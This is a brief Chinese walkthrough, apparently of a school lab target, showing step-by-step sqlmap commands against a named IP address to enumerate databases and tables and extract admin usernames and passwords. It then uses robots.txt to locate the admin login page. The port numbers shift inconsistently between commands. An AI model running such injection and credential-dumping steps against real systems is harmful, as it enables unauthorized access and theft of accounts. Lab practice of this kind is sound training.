利用 sqlmap 获得网站后台管理权限
(学校靶机)
0x00,0x01,0x02,0xo…
1,首先找到网站注入点:http://117.167.136.244:28004/index/narticle.php?nid=3100
上命令行扫描数据库:python sqlmap.py -u "http://117.167.136.244:28019/index/narticle.php?nid=3100" --dbs
这里盲猜是 rjxy 这个数据库,继续上命令行,进行数据表的爆破:
python sqlmap.py -u "http://117.167.136.244:28019/index/narticle.php?nid=3100" -D rjxy --tables
得到 数据表,然后看见 manager 这个表,猜测管理员账号密码就放在这张表,继续进行字段以及字段值的爆破:
上命令行:
python sqlmap.py -u "http://117.167.136.244:28000/index/narticle.php?nid=3100" -D rjxy -T manager --columns
以及:
python sqlmap.py -u "http://117.167.136.244:28000/index/narticle.php?nid=3100" -D rjxy -T manager -C "username,password"
最后获得 admin 以及密码;
最后使用robots.txt robot协议查看敏感访问页面,发现:
访问此页面进入登录界面,然后输入管理员账号密码成功进入网站后台。